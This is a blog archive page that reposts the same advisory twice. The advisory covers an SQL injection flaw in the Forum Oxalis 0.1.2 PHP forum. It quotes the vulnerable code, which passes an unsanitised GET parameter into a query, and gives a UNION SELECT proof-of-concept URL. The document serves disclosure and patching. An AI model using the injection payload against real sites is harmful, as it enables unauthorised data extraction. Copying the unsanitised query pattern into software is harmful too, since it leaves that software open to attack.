Tag Archive for Forum Oxalis 0.1.2

admin | 17 Temmuz 2012
No comments

Forum Oxalis <= 0.1.2 SQL Injection Vulnerability

Forum Oxalis 0.1.2 Sql injection açığı yükser risk taşıyor. func.php de bulunan açık verilerin çekilmesine imkan tanıyor. Bu scripti kullananlar açığı bir an önce fixlemelidir.

#################################################

Forum Oxalis 0.1.2

#################################################

Discovered by: Jean Pascal Pereira

Vendor information:

“Forum Oxalis is a minimalis GPL PHP forum using CSS.”

Vendor URI: http://developer.berlios.de/projects/forumoxalis/

#################################################

Risk-level: High

The application is prone to a remote SQL injection vulnerability.

————————————-

func.php, line 72:

function lister_messages($id, $page, $parpage)

{

global $mysql_table;

$resu = mysql_query(“select * from `$mysql_table` where id=$id”);

$nombre_messages = mysql_num_rows($resu);

forum.php, line 7:

$id = $_GET[‘id’];

forum.php, line 74:

case “message”:

lister_messages($id, $page, $reponses_par_page);

$reponse_a_id = $id;

break;

————————————-

Exploit / Proof Of Concept:

http://localhost/ForumOxalis/index.php?id=99999/**/UNION/**/SELECT/**/0x00,version(),0x00,0x00,0x00,0x00,0x00,0x00,0x00&action=message

————————————-

Solution:

Do some input validation.

————————————-

#################################################

Category: Genel | Tags: ,
admin | 17 Temmuz 2012
No comments

Forum Oxalis

Forum Oxalis 0.1.2 Sql injection açığı yükser risk taşıyor. func.php de bulunan açık verilerin çekilmesine imkan tanıyor. Bu scripti kullananlar açığı bir an önce fixlemelidir.

#################################################

Forum Oxalis 0.1.2

#################################################

Discovered by: Jean Pascal Pereira

Vendor information:

“Forum Oxalis is a minimalis GPL PHP forum using CSS.”

Vendor URI: http://developer.berlios.de/projects/forumoxalis/

#################################################

Risk-level: High

The application is prone to a remote SQL injection vulnerability.

————————————-

func.php, line 72:

function lister_messages($id, $page, $parpage)

{

global $mysql_table;

$resu = mysql_query(“select * from `$mysql_table` where id=$id”);

$nombre_messages = mysql_num_rows($resu);

forum.php, line 7:

$id = $_GET[‘id’];

forum.php, line 74:

case “message”:

lister_messages($id, $page, $reponses_par_page);

$reponse_a_id = $id;

break;

————————————-

Exploit / Proof Of Concept:

http://localhost/ForumOxalis/index.php?id=99999/**/UNION/**/SELECT/**/0x00,version(),0x00,0x00,0x00,0x00,0x00,0x00,0x00&action=message

————————————-

Solution:

Do some input validation.

————————————-

#################################################

Category: Genel | Tags: ,